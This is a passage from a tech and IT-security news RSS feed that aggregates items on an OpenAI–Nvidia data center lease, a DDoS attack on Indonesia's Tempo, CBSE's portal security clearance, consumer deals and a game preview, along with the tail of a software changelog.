<li>fix(tui): replaced thinking.autoPending question-mark glyphs with loading indicators by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4634329299" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2268" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2268/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2268">#2268</a></li>
<li>fix(catalog): handle missing thinking efforts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4630134022" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2252" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2252/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2252">#2252</a></li>
<li>fix(ai): flatten OpenRouter DeepSeek strict unions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4634643976" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2271" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2271/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2271">#2271</a></li>
<li>fix(agent): break shake auto-continue loop when local estimate diverges from provider usage by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4635063548" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2277" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2277/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2277">#2277</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v15.10.12...v15.11.0"><tt>v15.10.12...v15.11.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI weighs Nvidia-backed lease for 10 GW Ohio data center campus]]></title>
<description><![CDATA[OpenAI is reportedly in advanced talks to lease a proposed 10-gigawatt data center campus in southern Ohio in an arrangement that could include financial backing from Nvidia.



The campus could cost at least $500 billion to build at current prices for chips, power, and construction, The Informat...]]></description>
<link>https://tsecurity.de/de/3587595/it-security-nachrichten/openai-weighs-nvidia-backed-lease-for-10-gw-ohio-data-center-campus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3587595/it-security-nachrichten/openai-weighs-nvidia-backed-lease-for-10-gw-ohio-data-center-campus/</guid>
<pubDate>Wed, 10 Jun 2026 14:26:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>OpenAI is reportedly in advanced talks to lease a proposed 10-gigawatt data center campus in southern Ohio in an arrangement that could include financial backing from Nvidia.</p>



<p>The campus could cost at least $500 billion to build at current prices for chips, power, and construction, <a href="https://www.theinformation.com/articles/openai-talks-lease-10-gigawatt-ohio-data-center-backing-nvidia" target="_blank" rel="noreferrer noopener">The Information reported</a>, citing people familiar with the discussions.</p>



<p>OpenAI would control the computing equipment under a 20-year lease and begin payments once the site starts operating, with the first phase expected in 2028. Nvidia is expected to supply the hardware and guarantee both OpenAI’s lease obligations and the developer’s financing, the report added.</p>



<p>The reported structure highlights a broader shift in AI infrastructure strategy, where model developers, chip suppliers, and energy providers are forging increasingly long-term partnerships to secure compute capacity amid surging demand.</p>



<p>“These types of symbiotic deals are becoming the norm as AI infrastructure rolls out,” said Neil Shah, vice president for research and partner at Counterpoint Research. “If a CIO picks OpenAI to be the base layer, they shouldn’t just accept whatever infrastructure comes with it. CIOs need to negotiate and demand that OpenAI uses a mix of capacity so all your eggs are not in one premium basket like Nvidia.”</p>



<p>OpenAI and Nvidia did not immediately respond to requests for comment.</p>



<h2 class="wp-block-heading">A deeper infrastructure partnership</h2>



<p>The reported financing arrangement would extend a relationship that OpenAI and Nvidia formalized last year. In September 2025, the companies <a href="https://www.networkworld.com/article/4061728/nvidia-and-openai-open-100b-10-gw-data-center-alliance.html">announced a partnership</a> to deploy at least 10 gigawatts of Nvidia systems, with Nvidia stating it intended to invest up to $100 billion in OpenAI as each gigawatt came online. The first phase is scheduled to use Nvidia’s Vera Rubin platform.</p>



<p>A lease guarantee would add another layer to that relationship by linking Nvidia not only as OpenAI’s primary hardware supplier but also as a financial backstop for the infrastructure supporting its AI services.</p>



<p>“When a chip supplier guarantees a customer’s lease and the developer’s financing, the relationship stops being vendor and customer. It becomes a sponsor and a tenant,” said Sanchit Vir Gogia, chief analyst at Greyhound Research. “For enterprises, standardizing on OpenAI is therefore no longer a model decision. It is exposure to a single economic gravity field spanning silicon, power, capital, and regulatory attention.”</p>



<h2 class="wp-block-heading">The site behind the proposal</h2>



<p>The campus described in report aligns with a project the US Department of Energy <a href="https://sbenergy.com/doe-partnership-modernize-energy-infrastructure-piketon/">announced in March</a> to redevelop the former Portsmouth Gaseous Diffusion Plant near Piketon, Ohio.</p>



<p>Under that partnership, SB Energy, a SoftBank Group company, committed to building 10 gigawatts of new power generation capacity, including at least 9.2 gigawatts fueled by natural gas, along with billions of dollars in new transmission infrastructure. The department did not identify a tenant when it unveiled the project.</p>



<p>If the reported negotiations result in a deal, OpenAI would become the operator of the compute infrastructure housed at the site.</p>



<h2 class="wp-block-heading">What CIOs should watch</h2>



<p>For enterprise buyers, the reported deal structure reinforces the need to evaluate AI suppliers beyond model capabilities and pricing, analysts said.</p>



<p>Shah said CIOs should negotiate contracts that preserve infrastructure flexibility and avoid overdependence on a single compute ecosystem.</p>



<p>“OpenAI needs to diversify and offer capacity built on more cost-effective clouds like AWS or Google Cloud,” he said. “Matching the right cloud infrastructure to the right enterprise workload will be a critical strategy for enterprises.”</p>



<p>He also cautioned that projects of this scale typically take years to reach full capacity and carry significant execution risks.</p>



<p>“A 10-gigawatt site won’t just appear overnight and will take at least a decade to fully build out,” Shah said. “Making long-term commitment decisions based on that timeline comes with massive uncertainties.”</p>



<p>Gogia said scale should not be mistaken for access. “More compute does not cure scarcity,” he said. “It reschedules it.” The sharper risk is the financing, he added, which surfaces downstream as minimum commitments, reservation tiers, and usage thresholds even as token prices fall. “Scarcity does not disappear. It becomes contractual.”</p>



<p>The reported lease remains under negotiation, and questions around financing, permitting, and deployment timelines remain unresolved, the report added.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Should you send that midnight text? 11 essential rules for phone etiquette]]></title>
<description><![CDATA[What about using voice notes, or calling someone totally unannounced? Experts give their verdict on how to use your phone without causing offenceIt is not news that many of us are addicted to our phones and nor is it a revelation that inconsiderate public behaviour now appears to be the norm, but...]]></description>
<link>https://tsecurity.de/de/3587112/it-nachrichten/should-you-send-that-midnight-text-11-essential-rules-for-phone-etiquette/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3587112/it-nachrichten/should-you-send-that-midnight-text-11-essential-rules-for-phone-etiquette/</guid>
<pubDate>Wed, 10 Jun 2026 11:17:10 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>What about using voice notes, or calling someone totally unannounced? Experts give their verdict on how to use your phone without causing offence</p><p>It is not news that many of us are addicted to our phones and nor is it a revelation that inconsiderate public behaviour now appears to be the norm, but when the two collide it can cause anger. Last week, at the end of a performance of the drama Inter Alia in London’s West End, the actor Rosamund Pike took to the stage after the curtain call to announce that she had seen someone texting during the performance. “I just wanted to say for anyone going to the theatre, it’s a huge thing that we’re trying to give you. I am trying to tell you a story, and I’m feeling you, and I hope you’re feeling me too … Maybe it was very important, and maybe you’re a doctor, and you’re saving someone’s life, and I hope you are, but we do see these, we do feel them.”</p><p>What is the correct etiquette when using your phone? Myka Meier, author of Modern Etiquette Made Easy, says: “It is always thinking about other people before yourself when you’re on the phone.” This also means being aware of how disabled people might use, and rely on, their phones. As an academic with hearing loss pointed out to <a href="https://www.bbc.co.uk/news/articles/c0723zgdp0eo">the BBC</a> after Pike’s comments, bans on phones in theatres, or public shaming, could exclude disabled people in audiences, such as those who use hearing aid apps and need to adjust the settings.</p> <a href="https://www.theguardian.com/lifeandstyle/2026/jun/10/should-you-send-that-midnight-text-11-essential-rules-for-phone-etiquette">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[B&H's best $899 MacBook Air deal has been extended, but supply is limited]]></title>
<description><![CDATA[B&H's popular $899 MacBook Air deal has been extended exclusively for AppleInsider readers, but supply is limited and this upgraded model may sell out at any time.Grab this M4 MacBook Air with a 10-core GPU for just $899 - Image credit: AppleTo grab the blowout $899* special on the 13-inch MacBoo...]]></description>
<link>https://tsecurity.de/de/3586153/ios-mac-os/bhs-best-899-macbook-air-deal-has-been-extended-but-supply-is-limited/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3586153/ios-mac-os/bhs-best-899-macbook-air-deal-has-been-extended-but-supply-is-limited/</guid>
<pubDate>Wed, 10 Jun 2026 01:08:36 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[B&amp;H's popular <a href="https://prices.appleinsider.com/product/macbook-air-13-inch-m4/Z1CX000UJ">$899 MacBook Air deal</a> has been extended exclusively for AppleInsider readers, but supply is limited and this upgraded model may sell out at any time.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67891-143142-13-inch-macbook-air-899-sale-xl.jpg" alt="Open MacBook Air laptop with abstract blue screen pattern, large bold text reading MACBOOK AIR 10C GPU 899 dollars against a dark gradient red and blue background" height="720"><br><span>Grab this M4 MacBook Air with a 10-core GPU for just $899 - Image credit: Apple</span></div><br>To grab the <a href="https://www.bhphotovideo.com/c/product/1976228-REG/apple_mw133ll_a_13_macbook_air_m4.html/BI/1717/KBID/2301" rel="nofollow" target="_blank"><strong>blowout $899* special</strong></a> on the 13-inch MacBook Air M4, simply shop through the exclusive pricing links in this post from a laptop or desktop computer. This configuration, which is available at the reduced price in the Midnight finish, has a 10-core GPU (a $200 upgrade at launch), 16GB of RAM, and 512GB of storage.<br><br><a href="https://www.bhphotovideo.com/c/product/1976228-REG/apple_mw133ll_a_13_macbook_air_m4.html/BI/1717/KBID/2301" rel="nofollow" class="deal-highlight">Buy 13" MacBook Air M4 for $899</a><br><br><br> <a href="https://appleinsider.com/articles/26/06/09/bhs-best-899-macbook-air-deal-has-been-extended-but-supply-is-limited?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244609?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Indonesian Media Outlet Tempo Targeted by 24.9 Million DDoS Requests]]></title>
<description><![CDATA[A major wave of cyberattacks on Tempo has disrupted access to one of Indonesia's leading news websites, with the media outlet reporting millions of malicious requests directed at its servers over several days. The Tempo cyberattack, which began on Friday, June 5, 2026, involved a distributed deni...]]></description>
<link>https://tsecurity.de/de/3583644/it-security-nachrichten/indonesian-media-outlet-tempo-targeted-by-249-million-ddos-requests/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583644/it-security-nachrichten/indonesian-media-outlet-tempo-targeted-by-249-million-ddos-requests/</guid>
<pubDate>Tue, 09 Jun 2026 08:22:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1101" height="614" src="https://thecyberexpress.com/wp-content/uploads/cyberattacks-on-Tempo.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="cyberattacks on Tempo" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/cyberattacks-on-Tempo.webp 1101w, https://thecyberexpress.com/wp-content/uploads/cyberattacks-on-Tempo-300x167.webp 300w, https://thecyberexpress.com/wp-content/uploads/cyberattacks-on-Tempo-1024x571.webp 1024w, https://thecyberexpress.com/wp-content/uploads/cyberattacks-on-Tempo-768x428.webp 768w, https://thecyberexpress.com/wp-content/uploads/cyberattacks-on-Tempo-600x335.webp 600w, https://thecyberexpress.com/wp-content/uploads/cyberattacks-on-Tempo-150x84.webp 150w, https://thecyberexpress.com/wp-content/uploads/cyberattacks-on-Tempo-750x418.webp 750w, https://thecyberexpress.com/wp-content/uploads/cyberattacks-on-Tempo.webp 1101w, https://thecyberexpress.com/wp-content/uploads/cyberattacks-on-Tempo-300x167.webp 300w, https://thecyberexpress.com/wp-content/uploads/cyberattacks-on-Tempo-1024x571.webp 1024w, https://thecyberexpress.com/wp-content/uploads/cyberattacks-on-Tempo-768x428.webp 768w, https://thecyberexpress.com/wp-content/uploads/cyberattacks-on-Tempo-600x335.webp 600w, https://thecyberexpress.com/wp-content/uploads/cyberattacks-on-Tempo-150x84.webp 150w, https://thecyberexpress.com/wp-content/uploads/cyberattacks-on-Tempo-750x418.webp 750w" sizes="(max-width: 1101px) 100vw, 1101px" title="Indonesian Media Outlet Tempo Targeted by 24.9 Million DDoS Requests 1"></p><span data-contrast="auto">A major wave of cyberattacks on Tempo has disrupted access to one of Indonesia's leading news websites, with the media outlet reporting millions of malicious requests directed at its servers over several days. The Tempo cyberattack, which began on Friday, June 5, 2026, involved a distributed denial-of-service (DDoS) assault designed to overwhelm the company's infrastructure and hinder public access to its journalism.</span>

<span data-contrast="auto">According to Tempo's technology team, the attacks generated an extraordinary volume of fake internet traffic, placing significant pressure on the organization's servers and temporarily affecting the availability of the website for readers in Indonesia and elsewhere.</span>
<h3 aria-level="2"><b><span data-contrast="none">24.9 Million Requests Recorded During Cyberattacks on Tempo</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Tempo Digital Chief Technology Officer <a href="https://en.tempo.co/read/2107512/israel-halt-attacks-on-iran-at-trumps-request?tracking_page_direct" target="_blank" rel="nofollow noopener">Heru Tjatur Tjahja</a> said the cyberattacks on Tempo had reached an unprecedented scale. By Monday, June 8, 2026, the company's monitoring systems had logged a total of 24.9 million requests aimed at its servers.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">“The total attacks flooding our website as of June 8 reached 24.9 million requests,” Tjahja said on Monday, June 8, 2026.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">The Tempo cyberattack relied on bot-generated traffic, a common tactic used in <a href="https://thecyberexpress.com/eu-threat-landscape-hacktivism-ddos-ransomware/" target="_blank" rel="noopener">DDoS incidents</a>. Such attacks typically involve networks of compromised devices sending enormous numbers of requests simultaneously, overwhelming targeted systems and making websites difficult or impossible to access.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">Tjahja explained that preliminary findings indicated the attacks occurred intermittently but intensified dramatically during certain periods.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Largest Wave Hit During Evening Hours</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">The investigation into the cyberattacks on Tempo revealed a pattern in the timing of the attacks. According to Tjahja, the attackers frequently launched their operations during evening and early morning hours, when activity surged sharply.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">One of the most significant attack waves occurred between 8:30 p.m. and midnight. During that period alone, Tempo recorded 12.97 million attack requests within a span of just two hours.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">“For example, the first major wave consisted of 12.97 million attacks in only two hours. From 8:30 p.m. until midnight, the attackers carried out a digital assault,” he said.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">The intensity of the attack highlighted the scale of resources being used against the <a href="https://thecyberexpress.com/us-ddos-attacks-iran-hacktivists/" target="_blank" rel="noopener">Indonesian</a> media organization.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Attack Traffic Traced Beyond Indonesia</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Early analysis conducted by Tempo's technology team suggested that the sources of the malicious traffic extended well beyond Indonesia's borders.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">While the exact identities of those responsible remain unclear, investigators traced attack activity to multiple countries. According to Tempo, traffic associated with the cyberattacks on Tempo originated from Colombia, the United States, the Philippines, Bangladesh, Mexico, and Indonesia.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">The international nature of the attack traffic reflects the complexity of modern DDoS operations, which often use distributed networks of compromised devices globally to conceal the origin of an attack.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Possible Link to Earlier CMS Breach Attempt</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Tjahja believes the Tempo <a class="wpil_keyword_link" href="https://cyble.com/cyberattack/" target="_blank" rel="noopener" title="cyberattack" data-wpil-keyword-link="linked" data-wpil-monitor-id="28633">cyberattack</a> may be connected to an earlier security incident that targeted the organization's content management system (CMS) at the end of May 2026.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">During that earlier intrusion attempt, attackers managed to unpublish several articles that had already been published on the website. According to Tjahja, the content affected by the breach involved corruption-related reporting.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">However, the <a href="https://thecyberexpress.com/cve-2026-26980-ghost-cms-vulnerability/" target="_blank" rel="noopener">CMS architecture</a> limited the level of access available to unauthorized users. As a result, the attackers were unable to permanently remove the articles and could only temporarily unpublish them.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">According to Tjahja, the sequence of <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-security-events/" title="events" data-wpil-keyword-link="linked" data-wpil-monitor-id="28634">events</a> suggests a possible connection between the two incidents.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">“It appears that those behind the attacks were unhappy and then proceeded with the <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-ddos-attack/" target="_blank" rel="noopener" title="DDoS attack" data-wpil-keyword-link="linked" data-wpil-monitor-id="28635">DDoS attack</a>,” he said.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Penguin Colony Preview (PC)]]></title>
<description><![CDATA[Green, almost radioactive-looking stones probably make for bad habitats. They also hint that something bad is hiding under the ice, so I steer clear and decide to belly slide on the snow. Following the wind isn’t easy in this world of sheer ice cliffs and badly placed holes in the ice.

My pengui...]]></description>
<link>https://tsecurity.de/de/3582346/it-security-nachrichten/penguin-colony-preview-pc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582346/it-security-nachrichten/penguin-colony-preview-pc/</guid>
<pubDate>Mon, 08 Jun 2026 19:54:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Green, almost radioactive-looking stones probably make for bad habitats. They also hint that something bad is hiding under the ice, so I steer clear and decide to belly slide on the snow. Following the wind isn’t easy in this world of sheer ice cliffs and badly placed holes in the ice.

My penguin is probably unable to process information delivered by a human voice, but I have learned a lot. Expeditions from two countries are here in Antarctica. They are barely surviving the cold and darkness. And something older and deeper is gnawing at the edges of reality and crushing their sanity. The big question right now is: can a penguin go mad?

Penguin Colony is developed by ORIGAME DIGITAL and published by Fellow Traveller. I played a preview version on Steam. The video game focuses on getting the player inside the mind of a penguin with an unhealthy degree of curiosity.

On the brink of World War II, two would-be superpowers are scrambling to deal with a creature that is ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Surviving the surge of new Linux LPE :  Defense in Depth not dead]]></title>
<description><![CDATA[Thanks to AI-assisted vulnerability research and kernel patch diffing that breaks "responsible disclosure" embargos, it's quite the overwhelming time for defenders. There's been a weekly reveal of new Linux critical vulnerabilities, with full exploit scripts made public days before patchs are wid...]]></description>
<link>https://tsecurity.de/de/3581813/it-security-nachrichten/surviving-the-surge-of-new-linux-lpe-defense-in-depth-not-dead/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581813/it-security-nachrichten/surviving-the-surge-of-new-linux-lpe-defense-in-depth-not-dead/</guid>
<pubDate>Mon, 08 Jun 2026 16:53:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Thanks to AI-assisted vulnerability research and kernel patch diffing that breaks "responsible disclosure" embargos, it's quite the overwhelming time for defenders. There's been a weekly reveal of new Linux critical vulnerabilities, with full exploit scripts made public days before patchs are widely available.

Yet, most of the exploitation chains that have been recently published can be mitigated by tried-and-true Linux security hardening, giving wary defenders time to patch while N-day attackers try their shiny new ./exploit.sh.

Let's review some of them !]]></content:encoded>
</item>
<item>
<title><![CDATA[Dublin-based AI IP start-up Midnight Labs backed by Sony]]></title>
<description><![CDATA[Expansion in Japan will enable Midnight to operate in a country that is 'uniquely vulnerable to AI-generated copyright infringement' due to 'sophisticated digital piracy syndicates' operating at 'unprecedented scale'.
Read more: Dublin-based AI IP start-up Midnight Labs backed by Sony]]></description>
<link>https://tsecurity.de/de/3580809/it-nachrichten/dublin-based-ai-ip-start-up-midnight-labs-backed-by-sony/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580809/it-nachrichten/dublin-based-ai-ip-start-up-midnight-labs-backed-by-sony/</guid>
<pubDate>Mon, 08 Jun 2026 10:31:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Expansion in Japan will enable Midnight to operate in a country that is 'uniquely vulnerable to AI-generated copyright infringement' due to 'sophisticated digital piracy syndicates' operating at 'unprecedented scale'.</p>
<p>Read more: <a rel="nofollow" href="https://www.siliconrepublic.com/start-ups/dublin-based-ai-ip-start-up-midnight-labs-backed-by-sony">Dublin-based AI IP start-up Midnight Labs backed by Sony</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CBSE Re-Evaluation Portal Goes Live After Final Cybersecurity Clearance]]></title>
<description><![CDATA[The Central Board of Secondary Education has secured the final CBSE cybersecurity clearance required for its examiner-facing re-evaluation portal, allowing the reassessment of Class 12 answer scripts to move forward. The approval was granted on the night of June 6, 2026, after the completion of t...]]></description>
<link>https://tsecurity.de/de/3580758/it-security-nachrichten/cbse-re-evaluation-portal-goes-live-after-final-cybersecurity-clearance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580758/it-security-nachrichten/cbse-re-evaluation-portal-goes-live-after-final-cybersecurity-clearance/</guid>
<pubDate>Mon, 08 Jun 2026 10:16:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="841" height="589" src="https://thecyberexpress.com/wp-content/uploads/CBSE-cybersecurity-clearance.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="CBSE cybersecurity clearance" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/CBSE-cybersecurity-clearance.webp 841w, https://thecyberexpress.com/wp-content/uploads/CBSE-cybersecurity-clearance-300x210.webp 300w, https://thecyberexpress.com/wp-content/uploads/CBSE-cybersecurity-clearance-768x538.webp 768w, https://thecyberexpress.com/wp-content/uploads/CBSE-cybersecurity-clearance-600x420.webp 600w, https://thecyberexpress.com/wp-content/uploads/CBSE-cybersecurity-clearance-150x105.webp 150w, https://thecyberexpress.com/wp-content/uploads/CBSE-cybersecurity-clearance-750x525.webp 750w, https://thecyberexpress.com/wp-content/uploads/CBSE-cybersecurity-clearance.webp 841w, https://thecyberexpress.com/wp-content/uploads/CBSE-cybersecurity-clearance-300x210.webp 300w, https://thecyberexpress.com/wp-content/uploads/CBSE-cybersecurity-clearance-768x538.webp 768w, https://thecyberexpress.com/wp-content/uploads/CBSE-cybersecurity-clearance-600x420.webp 600w, https://thecyberexpress.com/wp-content/uploads/CBSE-cybersecurity-clearance-150x105.webp 150w, https://thecyberexpress.com/wp-content/uploads/CBSE-cybersecurity-clearance-750x525.webp 750w" sizes="(max-width: 841px) 100vw, 841px" title="CBSE Re-Evaluation Portal Goes Live After Final Cybersecurity Clearance 1"></p><span data-contrast="auto">The Central Board of Secondary Education has secured the final CBSE cybersecurity clearance required for its examiner-facing re-evaluation portal, allowing the reassessment of Class 12 answer scripts to move forward. The approval was granted on the night of June 6, 2026, after the completion of the final phase of cybersecurity testing conducted through an IIT-led red team and blue team audit.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">The development marks a significant step for more than 70,000 students who submitted valid applications for verification of marks and re-evaluation before the June 7 midnight deadline. According to a report first published by <a href="https://indianexpress.com/article/education/iit-panel-gives-nod-to-cbse-examiner-portal-paves-way-for-re-evaluation-10728872/">The Indian Express</a>, citing officials familiar with the matter, the final security clearance has now enabled examiners to begin accessing answer scripts through the upgraded system.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>
<h3 aria-level="3"><b><span data-contrast="none">CBSE Cybersecurity Clearance Granted After Final Security Audit</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">The final CBSE <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-cybersecurity/" title="cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="28621">cybersecurity</a> clearance followed extensive testing of the examiner-facing re-evaluation portal by cybersecurity experts from multiple institutions. An IIT official confirmed that all major <a href="https://thecyberexpress.com/cbse-osm-vulnerability/" target="_blank" rel="noopener">vulnerabilities</a> identified during the audit process had been addressed before the approval was granted.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">“From our side, we gave a green signal on Friday night. Whatever we found has been fixed, and we could not find anything more. There may be some minor <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="28626">vulnerabilities</a>, but nothing that would have any impact,” the official said.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">Although students had been able to submit applications through the portal since June 2, examiner access to answer scripts remained restricted until the <a href="https://thecyberexpress.com/dpdp-and-cybersecurity-rethinking-data-risk/" target="_blank" rel="noopener">cybersecurity review</a> process was completed. The latest clearance now allows the full re-evaluation workflow to commence.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>
<h3 aria-level="3"><b><span data-contrast="none">How the Re-Evaluation Portal Was Tested</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Before receiving the final CBSE cybersecurity clearance, the re-evaluation portal underwent a detailed red team and blue team assessment designed to identify and address potential <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="security" data-wpil-keyword-link="linked" data-wpil-monitor-id="28623">security</a> weaknesses.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">According to officials, IIT Kanpur’s cybersecurity experts spent more than ten days examining both the CBSE registration portal and the OSM re-evaluation portal.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">The registration portal had earlier been taken offline following a <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-a-cyber-attack/" title="cyberattack" data-wpil-keyword-link="linked" data-wpil-monitor-id="28622">cyberattack</a> before being relaunched on June 2. Meanwhile, the OSM platform underwent multiple rounds of security testing before ultimately receiving approval on June 6.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>
<h3 aria-level="3"><b><span data-contrast="none">Ethical Hacker Nisarga Adhikary Recognized for Reporting Vulnerabilities</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">The cybersecurity review process also included discussions with ethical <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-a-hacker/" title="hacker" data-wpil-keyword-link="linked" data-wpil-monitor-id="28625">hacker</a> Nisarga Adhikary, the 19-year-old cybersecurity researcher who publicly disclosed vulnerabilities within the OSM platform.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">An IIT Kanpur official confirmed that Adhikary was invited by CBSE to explain how he identified the weaknesses. His contribution was formally acknowledged during the review process.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">The official stated, “So far, we have not found any breach of <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28627">data</a> from the systems that have been created.”</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

